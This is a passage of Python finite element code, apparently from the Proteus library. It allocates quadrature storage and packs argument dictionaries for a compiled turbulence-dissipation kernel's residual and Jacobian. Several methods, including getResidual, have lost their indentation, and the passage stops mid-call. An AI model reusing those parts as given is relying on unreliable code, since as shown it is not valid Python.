        #    print self.nElementBoundaryQuadraturePoints_elementBoundary
        #    if self.nSpace_global == 3:
        #        assert(self.nElementBoundaryQuadraturePoints_elementBoundary == 4)
        #    elif self.nSpace_global == 2:
        #        assert(self.nElementBoundaryQuadraturePoints_elementBoundary == 4)
        #    elif self.nSpace_global == 1:
        #        assert(self.nElementBoundaryQuadraturePoints_elementBoundary == 1)
        #
        # storage dictionaries
        self.scalars_element = set()
        #
        # simplified allocations for test==trial and also check if space is mixed or not
        #
        # q: element interior quadrature, ebq/ebq_global: element boundary,
        # ebqe: exterior boundary, phi_ip: interpolation points
        self.q = {}
        self.ebq = {}
        self.ebq_global = {}
        self.ebqe = {}
        self.phi_ip = {}
        # mesh
        #self.q['x'] = np.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,3),'d')
        self.ebqe['x'] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary, 3), 'd')
        self.ebqe['n'] = np.zeros(
            (self.mesh.nExteriorElementBoundaries_global,
             self.nElementBoundaryQuadraturePoints_elementBoundary,
             self.nSpace_global),
            'd')
        self.q[('u', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
        self.q[('grad(u)', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element, self.nSpace_global), 'd')
        #diffusion, isotropic
        self.q[('a', 0, 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element, self.nSpace_global), 'd')
        self.q[('da', 0, 0, 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element, self.nSpace_global), 'd')
        # linear potential
        self.q[('phi', 0)] = self.q[('u', 0)]
        self.q[('grad(phi)', 0)] = self.q[('grad(u)', 0)]
        self.q[('dphi', 0, 0)] = np.ones((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
        # mass
        # NOTE: ('m', 0) and ('m_tmp', 0) alias ('u', 0) — they share storage
        self.q[('m', 0)] = self.q[('u', 0)]
        self.q[('m_last', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
        self.q[('m_tmp', 0)] = self.q[('u', 0)]
        self.q[('cfl', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
        self.q[('numDiff', 0, 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
        self.ebqe[('u', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
        self.ebqe[('grad(u)', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global,
                                              self.nElementBoundaryQuadraturePoints_elementBoundary, self.nSpace_global), 'd')
        self.ebqe[('advectiveFlux_bc_flag', 0)] = np.zeros(
            (self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'i')
        self.ebqe[('advectiveFlux_bc', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
        self.ebqe[('advectiveFlux', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
        self.ebqe[('diffusiveFlux_bc_flag', 0, 0)] = np.zeros(
            (self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'i')
        self.ebqe[('diffusiveFlux_bc', 0, 0)] = np.zeros(
            (self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
        self.ebqe[('penalty')] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
        self.points_elementBoundaryQuadrature = set()
        self.scalars_elementBoundaryQuadrature = set([('u', ci) for ci in range(self.nc)])
        self.vectors_elementBoundaryQuadrature = set()
        self.tensors_elementBoundaryQuadrature = set()
        self.inflowBoundaryBC = {}
        self.inflowBoundaryBC_values = {}
        self.inflowFlux = {}
        for cj in range(self.nc):
            self.inflowBoundaryBC[cj] = np.zeros((self.mesh.nExteriorElementBoundaries_global,), 'i')
            self.inflowBoundaryBC_values[cj] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nDOF_trial_element[cj]), 'd')
            self.inflowFlux[cj] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
        self.internalNodes = set(range(self.mesh.nNodes_global))
        # identify the internal nodes this is ought to be in mesh
        # \todo move this to mesh
        for ebNE in range(self.mesh.nExteriorElementBoundaries_global):
            ebN = self.mesh.exteriorElementBoundariesArray[ebNE]
            eN_global = self.mesh.elementBoundaryElementsArray[ebN, 0]
            ebN_element = self.mesh.elementBoundaryLocalElementBoundariesArray[ebN, 0]
            for i in range(self.mesh.nNodes_element):
                if i != ebN_element:
                    I = self.mesh.elementNodesArray[eN_global, i]
                    self.internalNodes -= set([I])
        self.nNodes_internal = len(self.internalNodes)
        self.internalNodesArray = np.zeros((self.nNodes_internal,), 'i')
        for nI, n in enumerate(self.internalNodes):
            self.internalNodesArray[nI] = n
        #
        del self.internalNodes
        self.internalNodes = None
        prof.logEvent("Updating local to global mappings", 2)
        self.updateLocal2Global()
        prof.logEvent("Building time integration object", 2)
        prof.logEvent(prof.memory("inflowBC, internalNodes,updateLocal2Global", "OneLevelTransport"), level=4)
        # mwf for interpolating subgrid error for gradients etc
        if self.stabilization and self.stabilization.usesGradientStabilization:
            self.timeIntegration = TimeIntegrationClass(self, integrateInterpolationPoints=True)
        else:
            self.timeIntegration = TimeIntegrationClass(self)
        if options is not None:
            self.timeIntegration.setFromOptions(options)
        prof.logEvent(prof.memory("TimeIntegration", "OneLevelTransport"), level=4)
        prof.logEvent("Calculating numerical quadrature formulas", 2)
        self.calculateQuadrature()
        self.setupFieldStrides()
        comm = proteus.Comm.get()
        self.comm = comm
        if comm.size() > 1:
            assert numericalFluxType is not None and numericalFluxType.useWeakDirichletConditions, "You must use a numerical flux to apply weak boundary conditions for parallel runs"
        prof.logEvent(prof.memory("stride+offset", "OneLevelTransport"), level=4)
        if numericalFluxType is not None:
            if options is None or options.periodicDirichletConditions is None:
                self.numericalFlux = numericalFluxType(self,
                                                       dofBoundaryConditionsSetterDict,
                                                       advectiveFluxBoundaryConditionsSetterDict,
                                                       diffusiveFluxBoundaryConditionsSetterDictDict)
            else:
                self.numericalFlux = numericalFluxType(self,
                                                       dofBoundaryConditionsSetterDict,
                                                       advectiveFluxBoundaryConditionsSetterDict,
                                                       diffusiveFluxBoundaryConditionsSetterDictDict,
                                                       options.periodicDirichletConditions)
        else:
            self.numericalFlux = None
        # set penalty terms
        # penalty = penalty_constant / h**penalty_power per boundary quadrature point
        # cek todo move into numerical flux initialization
        if 'penalty' in self.ebq_global:
            for ebN in range(self.mesh.nElementBoundaries_global):
                for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):
                    self.ebq_global['penalty'][ebN, k] = old_div(self.numericalFlux.penalty_constant, \
                        (self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power))
        # penalty term
        # cek move to Numerical flux initialization
        if 'penalty' in self.ebqe:
            for ebNE in range(self.mesh.nExteriorElementBoundaries_global):
                ebN = self.mesh.exteriorElementBoundariesArray[ebNE]
                for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):
                    self.ebqe['penalty'][ebNE, k] = old_div(self.numericalFlux.penalty_constant, \
                        self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power)
        prof.logEvent(prof.memory("numericalFlux", "OneLevelTransport"), level=4)
        self.elementEffectiveDiametersArray = self.mesh.elementInnerDiametersArray
        # use post processing tools to get conservative fluxes, None by default
        from proteus import PostProcessingTools
        self.velocityPostProcessor = PostProcessingTools.VelocityPostProcessingChooser(self)
        prof.logEvent(prof.memory("velocity postprocessor", "OneLevelTransport"), level=4)
        # helper for writing out data storage
        from proteus import Archiver
        self.elementQuadratureDictionaryWriter = Archiver.XdmfWriter()
        self.elementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()
        self.exteriorElementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()
        # TODO get rid of this
        # mwf can I use the numericalFlux's flag information?
        # evaluate flux boundary conditions at t and mark which points have them set
        for ci, fbcObject in list(self.fluxBoundaryConditionsObjectsDict.items()):
            self.ebqe[('advectiveFlux_bc_flag', ci)] = np.zeros(self.ebqe[('advectiveFlux_bc', ci)].shape, 'i')
            for t, g in list(fbcObject.advectiveFluxBoundaryConditionsDict.items()):
                if ci in self.coefficients.advection:
                    self.ebqe[('advectiveFlux_bc', ci)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
                    self.ebqe[('advectiveFlux_bc_flag', ci)][t[0], t[1]] = 1
            for ck, diffusiveFluxBoundaryConditionsDict in list(fbcObject.diffusiveFluxBoundaryConditionsDictDict.items()):
                self.ebqe[('diffusiveFlux_bc_flag', ck, ci)] = np.zeros(self.ebqe[('diffusiveFlux_bc', ck, ci)].shape, 'i')
                for t, g in list(diffusiveFluxBoundaryConditionsDict.items()):
                    self.ebqe[('diffusiveFlux_bc', ck, ci)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
                    self.ebqe[('diffusiveFlux_bc_flag', ck, ci)][t[0], t[1]] = 1
        if hasattr(self.numericalFlux, 'setDirichletValues'):
            self.numericalFlux.setDirichletValues(self.ebqe)
        if not hasattr(self.numericalFlux, 'isDOFBoundary'):
            self.numericalFlux.isDOFBoundary = {0: np.zeros(self.ebqe[('u', 0)].shape, 'i')}
        if not hasattr(self.numericalFlux, 'ebqe'):
            self.numericalFlux.ebqe = {('u', 0): np.zeros(self.ebqe[('u', 0)].shape, 'd')}
        # TODO how to handle redistancing calls for calculateCoefficients,calculateElementResidual etc
        self.globalResidualDummy = None
        compKernelFlag = 0
        # instantiate the compiled kernel wrapper for the right space dimension
        if self.nSpace_global == 2:
            self.dissipation = cDissipation2D_base(self.nSpace_global,
                                                   self.nQuadraturePoints_element,
                                                   self.u[0].femSpace.elementMaps.localFunctionSpace.dim,
                                                   self.u[0].femSpace.referenceFiniteElement.localFunctionSpace.dim,
                                                   self.testSpace[0].referenceFiniteElement.localFunctionSpace.dim,
                                                   self.nElementBoundaryQuadraturePoints_elementBoundary,
                                                   compKernelFlag,
                                                   self.coefficients.aDarcy,
                                                   self.coefficients.betaForch,
                                                   self.coefficients.grain,
                                                   self.coefficients.packFraction,
                                                   self.coefficients.packMargin,
                                                   self.coefficients.maxFraction,
                                                   self.coefficients.frFraction,
                                                   self.coefficients.sigmaC,
                                                   self.coefficients.C3e,
                                                   self.coefficients.C4e,
                                                   self.coefficients.eR,
                                                   self.coefficients.fContact,
                                                   self.coefficients.mContact,
                                                   self.coefficients.nContact,
                                                   self.coefficients.angFriction,
                                                   self.coefficients.vos_limiter,
                                                   self.coefficients.mu_fr_limiter)
        else:
            self.dissipation = cDissipation_base(self.nSpace_global,
                                                 self.nQuadraturePoints_element,
                                                 self.u[0].femSpace.elementMaps.localFunctionSpace.dim,
                                                 self.u[0].femSpace.referenceFiniteElement.localFunctionSpace.dim,
                                                 self.testSpace[0].referenceFiniteElement.localFunctionSpace.dim,
                                                 self.nElementBoundaryQuadraturePoints_elementBoundary,
                                                 compKernelFlag,
                                                 self.coefficients.aDarcy,
                                                 self.coefficients.betaForch,
                                                 self.coefficients.grain,
                                                 self.coefficients.packFraction,
                                                 self.coefficients.packMargin,
                                                 self.coefficients.maxFraction,
                                                 self.coefficients.frFraction,
                                                 self.coefficients.sigmaC,
                                                 self.coefficients.C3e,
                                                 self.coefficients.C4e,
                                                 self.coefficients.eR,
                                                 self.coefficients.fContact,
                                                 self.coefficients.mContact,
                                                 self.coefficients.nContact,
                                                 self.coefficients.angFriction,
                                                 self.coefficients.vos_limiter,
                                                 self.coefficients.mu_fr_limiter)
        self.forceStrongConditions = False
        if self.forceStrongConditions:
            self.dirichletConditionsForceDOF = DOFBoundaryConditions(self.u[0].femSpace, dofBoundaryConditionsSetterDict[0], weakDirichletConditions=False)
        if self.movingDomain:
            self.MOVING_DOMAIN = 1.0
        else:
            self.MOVING_DOMAIN = 0.0
        # cek hack
        # moving-domain support is force-disabled here regardless of the argument
        self.movingDomain = False
        self.MOVING_DOMAIN = 0.0
        if self.mesh.nodeVelocityArray is None:
            self.mesh.nodeVelocityArray = np.zeros(self.mesh.nodeArray.shape, 'd')
# mwf these are getting called by redistancing classes,
def calculateCoefficients(self):
pass
def calculateElementResidual(self):
if self.globalResidualDummy is not None:
self.getResidual(self.u[0].dof, self.globalResidualDummy)
def getResidual(self, u, r):
import pdb
import copy
"""
Calculate the element residuals and add in to the global residual
"""
r.fill(0.0)
# Load the unknowns into the finite element dof
self.timeIntegration.calculateCoefs()
# print "***************max/min(m_last)*********************",max(self.timeIntegration.m_last[0].flat[:]),min(self.timeIntegration.m_last[0].flat[:])
# print "***************max/min(m_last)*********************",max(-self.timeIntegration.dt*self.timeIntegration.beta_bdf[0].flat[:]),min(-self.timeIntegration.dt*self.timeIntegration.beta_bdf[0].flat[:]),
self.timeIntegration.calculateU(u)
self.setUnknowns(self.timeIntegration.u)
# cek can put in logic to skip of BC's don't depend on t or u
# Dirichlet boundary conditions
# if hasattr(self.numericalFlux,'setDirichletValues'):
self.numericalFlux.setDirichletValues(self.ebqe)
# flux boundary conditions
for t, g in list(self.fluxBoundaryConditionsObjectsDict[0].advectiveFluxBoundaryConditionsDict.items()):
self.ebqe[('advectiveFlux_bc', 0)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
self.ebqe[('advectiveFlux_bc_flag', 0)][t[0], t[1]] = 1
for ck, diffusiveFluxBoundaryConditionsDict in list(self.fluxBoundaryConditionsObjectsDict[0].diffusiveFluxBoundaryConditionsDictDict.items()):
for t, g in list(diffusiveFluxBoundaryConditionsDict.items()):
self.ebqe[('diffusiveFlux_bc', ck, 0)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
self.ebqe[('diffusiveFlux_bc_flag', ck, 0)][t[0], t[1]] = 1
# self.shockCapturing.lag=True
if self.forceStrongConditions:
for dofN, g in list(self.dirichletConditionsForceDOF.DOFBoundaryConditionsDict.items()):
self.u[0].dof[dofN] = g(self.dirichletConditionsForceDOF.DOFBoundaryPointDict[dofN], self.timeIntegration.t)
#
# mwf debug
#import pdb
# pdb.set_trace()
argsDict = cArgumentsDict.ArgumentsDict()
argsDict["mesh_trial_ref"] = self.u[0].femSpace.elementMaps.psi
argsDict["mesh_grad_trial_ref"] = self.u[0].femSpace.elementMaps.grad_psi
argsDict["mesh_dof"] = self.mesh.nodeArray
argsDict["mesh_velocity_dof"] = self.mesh.nodeVelocityArray
argsDict["MOVING_DOMAIN"] = self.MOVING_DOMAIN
argsDict["mesh_l2g"] = self.mesh.elementNodesArray
argsDict["dV_ref"] = self.elementQuadratureWeights[('u', 0)]
argsDict["u_trial_ref"] = self.u[0].femSpace.psi
argsDict["u_grad_trial_ref"] = self.u[0].femSpace.grad_psi
argsDict["u_test_ref"] = self.u[0].femSpace.psi
argsDict["u_grad_test_ref"] = self.u[0].femSpace.grad_psi
argsDict["mesh_trial_trace_ref"] = self.u[0].femSpace.elementMaps.psi_trace
argsDict["mesh_grad_trial_trace_ref"] = self.u[0].femSpace.elementMaps.grad_psi_trace
argsDict["dS_ref"] = self.elementBoundaryQuadratureWeights[('u', 0)]
argsDict["u_trial_trace_ref"] = self.u[0].femSpace.psi_trace
argsDict["u_grad_trial_trace_ref"] = self.u[0].femSpace.grad_psi_trace
argsDict["u_test_trace_ref"] = self.u[0].femSpace.psi_trace
argsDict["u_grad_test_trace_ref"] = self.u[0].femSpace.grad_psi_trace
argsDict["normal_ref"] = self.u[0].femSpace.elementMaps.boundaryNormals
argsDict["boundaryJac_ref"] = self.u[0].femSpace.elementMaps.boundaryJacobians
argsDict["nElements_global"] = self.mesh.nElements_global
argsDict["nu_0"] = self.coefficients.nu_0
argsDict["nu_1"] = self.coefficients.nu_1
argsDict["sigma_e"] = self.coefficients.sigma_e
argsDict["c_mu"] = self.coefficients.c_mu
argsDict["c_1"] = self.coefficients.c_1
argsDict["c_2"] = self.coefficients.c_2
argsDict["c_e"] = self.coefficients.c_e
argsDict["rho_0"] = self.coefficients.rho_0
argsDict["rho_1"] = self.coefficients.rho_1
argsDict["sedFlag"] = self.coefficients.sedFlag
argsDict["q_vos"] = self.coefficients.q_vos
argsDict["q_vos_gradc"] = self.coefficients.grad_vos
argsDict["ebqe_q_vos"] = self.coefficients.ebqe_vos
argsDict["ebqe_q_vos_gradc"] = self.coefficients.ebqe_grad_vos
argsDict["rho_f"] = self.coefficients.rho_0
argsDict["rho_s"] = self.coefficients.rho_s
argsDict["vs"] = self.coefficients.vs
argsDict["ebqe_vs"] = self.coefficients.ebqe_vs
argsDict["g"] = self.coefficients.g
argsDict["dissipation_model_flag"] = self.coefficients.dissipation_model_flag
argsDict["useMetrics"] = self.coefficients.useMetrics
argsDict["alphaBDF"] = self.timeIntegration.alpha_bdf
argsDict["lag_shockCapturing"] = self.shockCapturing.lag
argsDict["shockCapturingDiffusion"] = self.shockCapturing.shockCapturingFactor
argsDict["sc_uref"] = self.coefficients.sc_uref
argsDict["sc_alpha"] = self.coefficients.sc_beta
argsDict["u_l2g"] = self.u[0].femSpace.dofMap.l2g
argsDict["elementDiameter"] = self.mesh.elementDiametersArray
argsDict["u_dof"] = self.u[0].dof
argsDict["u_dof_old"] = self.coefficients.u_old_dof
argsDict["velocity"] = self.coefficients.q_v
argsDict["phi_ls"] = self.coefficients.q_phi
argsDict["q_kappa"] = self.coefficients.q_kappa
argsDict["q_grad_kappa"] = self.coefficients.q_grad_kappa
argsDict["q_porosity"] = self.coefficients.q_porosity
argsDict["velocity_dof_u"] = self.coefficients.velocity_dof_u
argsDict["velocity_dof_v"] = self.coefficients.velocity_dof_v
argsDict["velocity_dof_w"] = self.coefficients.velocity_dof_w
argsDict["q_m"] = self.timeIntegration.m_tmp[0]
argsDict["q_u"] = self.q[('u', 0)]
argsDict["q_grad_u"] = self.q[('grad(u)', 0)]
argsDict["q_m_betaBDF"] = self.timeIntegration.beta_bdf[0]
argsDict["cfl"] = self.q[('cfl', 0)]
argsDict["q_numDiff_u"] = self.shockCapturing.numDiff[0]
argsDict["q_numDiff_u_last"] = self.shockCapturing.numDiff_last[0]
argsDict["ebqe_penalty_ext"] = self.ebqe['penalty']
argsDict["offset_u"] = self.offset[0]
argsDict["stride_u"] = self.stride[0]
argsDict["globalResidual"] = r
argsDict["nExteriorElementBoundaries_global"] = self.mesh.nExteriorElementBoundaries_global
argsDict["exteriorElementBoundariesArray"] = self.mesh.exteriorElementBoundariesArray
argsDict["elementBoundaryElementsArray"] = self.mesh.elementBoundaryElementsArray
argsDict["elementBoundaryLocalElementBoundariesArray"] = self.mesh.elementBoundaryLocalElementBoundariesArray
argsDict["ebqe_velocity_ext"] = self.coefficients.ebqe_v
argsDict["isDOFBoundary_u"] = self.numericalFlux.isDOFBoundary[0]
argsDict["ebqe_bc_u_ext"] = self.numericalFlux.ebqe[('u', 0)]
argsDict["isAdvectiveFluxBoundary_u"] = self.ebqe[('advectiveFlux_bc_flag', 0)]
argsDict["ebqe_bc_advectiveFlux_u_ext"] = self.ebqe[('advectiveFlux_bc', 0)]
argsDict["isDiffusiveFluxBoundary_u"] = self.ebqe[('diffusiveFlux_bc_flag', 0, 0)]
argsDict["ebqe_bc_diffusiveFlux_u_ext"] = self.ebqe[('diffusiveFlux_bc', 0, 0)]
argsDict["ebqe_phi"] = self.coefficients.ebqe_phi
argsDict["epsFact"] = self.coefficients.epsFact
argsDict["ebqe_kappa"] = self.coefficients.ebqe_kappa
argsDict["ebqe_porosity"] = self.coefficients.ebqe_porosity
argsDict["ebqe_u"] = self.ebqe[('u', 0)]
argsDict["ebqe_flux"] = self.ebqe[('advectiveFlux', 0)]
self.dissipation.calculateResidual(argsDict)
if self.forceStrongConditions:
for dofN, g in list(self.dirichletConditionsForceDOF.DOFBoundaryConditionsDict.items()):
r[dofN] = 0
if self.stabilization:
self.stabilization.accumulateSubgridMassHistory(self.q)
prof.logEvent("Global residual", level=9, data=r)
# mwf decide if this is reasonable for keeping solver statistics
self.nonlinear_function_evaluations += 1
if self.globalResidualDummy is None:
self.globalResidualDummy = np.zeros(r.shape, 'd')
    def getJacobian(self, jacobian):
        """Assemble the global Jacobian (CSR) via the compiled Dissipation kernel.

        Zeros the existing CSR values, packs the argument dictionary the C
        ``calculateJacobian`` routine reads, then (when strong Dirichlet
        conditions are forced) overwrites the corresponding matrix rows with
        identity-like rows.  Returns ``jacobian``.
        """
        cfemIntegrals.zeroJacobian_CSR(self.nNonzerosInJacobian,
                                       jacobian)
        # pack every array/scalar the C Jacobian kernel reads
        argsDict = cArgumentsDict.ArgumentsDict()
        argsDict["mesh_trial_ref"] = self.u[0].femSpace.elementMaps.psi
        argsDict["mesh_grad_trial_ref"] = self.u[0].femSpace.elementMaps.grad_psi
        argsDict["mesh_dof"] = self.mesh.nodeArray
        argsDict["mesh_velocity_dof"] = self.mesh.nodeVelocityArray
        argsDict["MOVING_DOMAIN"] = self.MOVING_DOMAIN
        argsDict["mesh_l2g"] = self.mesh.elementNodesArray
        argsDict["dV_ref"] = self.elementQuadratureWeights[('u', 0)]
        argsDict["u_trial_ref"] = self.u[0].femSpace.psi
        argsDict["u_grad_trial_ref"] = self.u[0].femSpace.grad_psi
        argsDict["u_test_ref"] = self.u[0].femSpace.psi
        argsDict["u_grad_test_ref"] = self.u[0].femSpace.grad_psi
        argsDict["mesh_trial_trace_ref"] = self.u[0].femSpace.elementMaps.psi_trace
        argsDict["mesh_grad_trial_trace_ref"] = self.u[0].femSpace.elementMaps.grad_psi_trace
        argsDict["dS_ref"] = self.elementBoundaryQuadratureWeights[('u', 0)]
        argsDict["u_trial_trace_ref"] = self.u[0].femSpace.psi_trace
        argsDict["u_grad_trial_trace_ref"] = self.u[0].femSpace.grad_psi_trace
        argsDict["u_test_trace_ref"] = self.u[0].femSpace.psi_trace
        argsDict["u_grad_test_trace_ref"] = self.u[0].femSpace.grad_psi_trace
        argsDict["normal_ref"] = self.u[0].femSpace.elementMaps.boundaryNormals
        argsDict["boundaryJac_ref"] = self.u[0].femSpace.elementMaps.boundaryJacobians
        argsDict["nElements_global"] = self.mesh.nElements_global
        argsDict["nu_0"] = self.coefficients.nu_0
        argsDict["nu_1"] = self.coefficients.nu_1
        argsDict["sigma_e"] = self.coefficients.sigma_e
        argsDict["c_mu"] = self.coefficients.c_mu
        argsDict["c_1"] = self.coefficients.c_1
        argsDict["c_2"] = self.coefficients.c_2
        argsDict["c_e"] = self.coefficients.c_e
        argsDict["rho_0"] = self.coefficients.rho_0
        argsDict["rho_1"] = self.coefficients.rho_1
        argsDict["dissipation_model_flag"] = self.coefficients.dissipation_model_flag
        argsDict["useMetrics"] = self.coefficients.useMetrics
        argsDict["alphaBDF"] = self.timeIntegration.alpha_bdf
        argsDict["lag_shockCapturing"] = self.shockCapturing.lag
        argsDict["shockCapturingDiffusion"] = self.shockCapturing.shockCapturingFactor
        argsDict["u_l2g"] = self.u[0].femSpace.dofMap.l2g
        argsDict["elementDiameter"] = self.mesh.elementDiametersArray
        argsDict["u_dof"] = self.u[0].dof
        argsDict["u_dof_old"] = self.coefficients.u_old_dof
        argsDict["velocity"] = self.coefficients.q_v
        argsDict["phi_ls"] = self.coefficients.q_phi
        argsDict["q_kappa"] = self.coefficients.q_kappa
        argsDict["q_grad_kappa"] = self.coefficients.q_grad_kappa
        argsDict["q_porosity"] = self.coefficients.q_porosity
        argsDict["sedFlag"] = self.coefficients.sedFlag
        argsDict["q_vos"] = self.coefficients.q_vos
        argsDict["q_vos_gradc"] = self.coefficients.grad_vos
        argsDict["ebqe_q_vos"] = self.coefficients.ebqe_vos
        argsDict["ebqe_q_vos_gradc"] = self.coefficients.ebqe_grad_vos
        argsDict["rho_f"] = self.coefficients.rho_0
        argsDict["rho_s"] = self.coefficients.rho_s
        argsDict["vs"] = self.coefficients.vs
        argsDict["ebqe_vs"] = self.coefficients.ebqe_vs
        argsDict["g"] = self.coefficients.g
        argsDict["velocity_dof_u"] = self.coefficients.velocity_dof_u
        argsDict["velocity_dof_v"] = self.coefficients.velocity_dof_v
        argsDict["velocity_dof_w"] = self.coefficients.velocity_dof_w
        argsDict["q_m_betaBDF"] = self.timeIntegration.beta_bdf[0]
        argsDict["cfl"] = self.q[('cfl', 0)]
        argsDict["q_numDiff_u_last"] = self.shockCapturing.numDiff_last[0]
        argsDict["ebqe_penalty_ext"] = self.ebqe['penalty']
        argsDict["csrRowIndeces_u_u"] = self.csrRowIndeces[(0, 0)]
        argsDict["csrColumnOffsets_u_u"] = self.csrColumnOffsets[(0, 0)]
        argsDict["globalJacobian"] = jacobian.getCSRrepresentation()[2]
        argsDict["nExteriorElementBoundaries_global"] = self.mesh.nExteriorElementBoundaries_global
        argsDict["exteriorElementBoundariesArray"] = self.mesh.exteriorElementBoundariesArray
        argsDict["elementBoundaryElementsArray"] = self.mesh.elementBoundaryElementsArray
        argsDict["elementBoundaryLocalElementBoundariesArray"] = self.mesh.elementBoundaryLocalElementBoundariesArray
        argsDict["ebqe_velocity_ext"] = self.coefficients.ebqe_v
        argsDict["isDOFBoundary_u"] = self.numericalFlux.isDOFBoundary[0]
        argsDict["ebqe_bc_u_ext"] = self.numericalFlux.ebqe[('u', 0)]
        argsDict["isAdvectiveFluxBoundary_u"] = self.ebqe[('advectiveFlux_bc_flag', 0)]
        argsDict["ebqe_bc_advectiveFlux_u_ext"] = self.ebqe[('advectiveFlux_bc', 0)]
        argsDict["isDiffusiveFluxBoundary_u"] = self.ebqe[('diffusiveFlux_bc_flag', 0, 0)]
        argsDict["ebqe_bc_diffusiveFlux_u_ext"] = self.ebqe[('diffusiveFlux_bc', 0, 0)]
        argsDict["csrColumnOffsets_eb_u_u"] = self.csrColumnOffsets_eb[(0, 0)]
        argsDict["ebqe_phi"] = self.coefficients.ebqe_phi
        argsDict["epsFact"] = self.coefficients.epsFact
        argsDict["ebqe_kappa"] = self.coefficients.ebqe_kappa
        argsDict["ebqe_porosity"] = self.coefficients.ebqe_porosity
        self.dissipation.calculateJacobian(argsDict)  # VRANS
        # Load the Dirichlet conditions directly into residual
        # for each forced DOF, set the diagonal to `scaling` and zero the rest of the row
        if self.forceStrongConditions:
            scaling = 1.0  # probably want to add some scaling to match non-dirichlet diagonals in linear system
            for dofN in list(self.dirichletConditionsForceDOF.DOFBoundaryConditionsDict.keys()):
                global_dofN = dofN
                for i in range(self.rowptr[global_dofN], self.rowptr[global_dofN + 1]):
                    if (self.colind[i] == global_dofN):
                        # print "RBLES forcing residual cj = %s dofN= %s global_dofN= %s was self.nzval[i]= %s now =%s " % (cj,dofN,global_dofN,self.nzval[i],scaling)
                        self.nzval[i] = scaling
                    else:
                        self.nzval[i] = 0.0
                        # print "RBLES zeroing residual cj = %s dofN= %s global_dofN= %s " % (cj,dofN,global_dofN)
        prof.logEvent("Jacobian ", level=10, data=jacobian)
        # mwf decide if this is reasonable for solver statistics
        self.nonlinear_function_jacobian_evaluations += 1
        return jacobian
    def calculateElementQuadrature(self):
        """
        Calculate the physical location and weights of the quadrature rules
        and the shape information at the quadrature points.

        This function should be called only when the mesh changes.
        """
        # self.u[0].femSpace.elementMaps.getValues(self.elementQuadraturePoints,
        #                                          self.q['x'])
        # Only component 0's FEM space is used to evaluate basis values and
        # gradients on the reference element (shared by all elements).
        self.u[0].femSpace.elementMaps.getBasisValuesRef(self.elementQuadraturePoints)
        self.u[0].femSpace.elementMaps.getBasisGradientValuesRef(self.elementQuadraturePoints)
        self.u[0].femSpace.getBasisValuesRef(self.elementQuadraturePoints)
        self.u[0].femSpace.getBasisGradientValuesRef(self.elementQuadraturePoints)
        # Let the coefficients object precompute anything it needs at the
        # element quadrature points for the current time level.
        self.coefficients.initializeElementQuadrature(self.timeIntegration.t, self.q)
        if self.stabilization is not None:
            self.stabilization.initializeElementQuadrature(self.mesh, self.timeIntegration.t, self.q)
            self.stabilization.initializeTimeIntegration(self.timeIntegration)
        if self.shockCapturing is not None:
            self.shockCapturing.initializeElementQuadrature(self.mesh, self.timeIntegration.t, self.q)
    def calculateElementBoundaryQuadrature(self):
        """Intentionally a no-op: interior element-boundary quadrature is not
        computed for this model (only exterior boundaries are handled, see
        calculateExteriorElementBoundaryQuadrature)."""
        pass
def calculateExteriorElementBoundaryQuadrature(self):
"""
Calculate the physical location and weights of the quadrature rules
and the shape information at the quadrature points on global element boundaries.
This function should be called only when the mesh changes.
"""
#
# get physical locations of element boundary quadrature points
#
# assume all components live on the same mesh
self.u[0].femSpace.elementMaps.getBasisValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.elementMaps.getBasisGradientValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.getBasisValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.getBasisGradientValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.elementMaps.getValuesGlobalExteriorTrace(self.elementBoundaryQuadraturePoints,
self.ebqe['x'])
self.fluxBoundaryConditionsObjectsDict = dict([(cj, proteus.FemTools.FluxBoundaryConditions(self.mesh,
self.nElementBoundaryQuadraturePoints_elementBoundary,
self.ebqe[('x')],
getAdvectiveFluxBoundaryConditions=self.advectiveFluxBoundaryConditionsSetterDict[cj],
